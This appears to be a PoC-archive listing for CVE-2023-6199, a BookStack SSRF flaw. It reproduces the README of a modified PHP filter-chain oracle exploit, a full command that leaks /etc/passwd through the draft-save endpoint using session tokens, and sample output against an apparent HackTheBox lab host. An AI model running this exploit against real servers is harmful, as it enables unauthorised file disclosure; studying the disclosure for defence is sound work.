POC details: 59ea3a10664bd81ce96c2cb3189aa889878eee6b

Source
Related vulnerability
Title: BookStack code issue vulnerability (CVE-2023-6199)
Description: BookStack is a simple, self-hosted, easy-to-use platform from BookStack for organizing and storing information. BookStack version 23.10.2 contains a code issue vulnerability: it allows filtering local files on the server, which leaves the application exposed to SSRF attacks.
Description
A CLI to exploit parameters vulnerable to PHP filter chain error based oracle, modified to exploit CVE-2023-6199
Introduction
# PHP filter chains: file read from error-based oracle. Updated Script to exploit CVE-2023-6199

A CLI to exploit parameters affected by the file read primitive of the error-based oracle of PHP filter chains. It can be used to leak the content of a local file when the parameter is passed to vulnerable functions, such as `file()`, `hash_file()`, `file_get_contents()` or `copy()`, even when the server does not return the file content!
In this case it is used to read files by exploiting an SSRF vulnerability in BookStack version 23.10.2, identified by CVE-2023-6199, which allows filtering local files on the server.

## Example of Usage

```bash
$ python3 filters_chain_oracle_exploit.py --parameter html --headers '{"Content-Type": "application/x-www-form-urlencoded","X-CSRF-TOKEN":"your_CSRF_token","Cookie":"bookstack_session=your_session_token"}' --verb PUT --target http://localhost:80/ajax/page/your_page_number/save-draft --file '/etc/passwd'
```

```bash
[*] The following URL is targeted : http://checker.htb/ajax/page/9/save-draft
[*] The following local file is leaked : /etc/passwd
[*] Running PUT requests
[*] Additionnal headers used : {"Content-Type": "application/x-www-form-urlencoded","X-CSRF-TOKEN":"your_CSRF_token","Cookie":"bookstack_session=your_session_token"}
[+] File /etc/passwd leak is finished!
```

## References

- [CVE-2023-6199 - MITRE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6199)
- [LFR via Blind SSRF in BookStack - Fluid Attacks](https://fluidattacks.com/blog/lfr-via-blind-ssrf-book-stack/?utm_source=mailing&utm_medium=activecampaign&utm_campaign=blognov22)
- [PHP Filter Chains Oracle Exploit - Synacktiv](https://github.com/synacktiv/php_filter_chains_oracle_exploit)

File snapshot

```
[4.0K] /data/pocs/59ea3a10664bd81ce96c2cb3189aa889878eee6b
├── [4.0K] filters_chain_oracle
│   ├── [4.0K] core
│   │   ├── [ 16K] bruteforcer.py
│   │   ├── [6.3K] requestor.py
│   │   ├── [ 303] utils.py
│   │   └── [ 157] verb.py
│   └── [4.0K] tests
│       ├── [   0] __init__.py
│       └── [4.7K] test.py
├── [7.5K] filters_chain_oracle_exploit.py
├── [ 368] LICENSE
├── [1.7K] README.md
└── [   9] requirements.txt

3 directories, 10 files
```

The Shenlong bot has cached this for you.

Notes
    1. It is recommended to access the POC through the original source first.
    2. If the source has expired or cannot be accessed, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.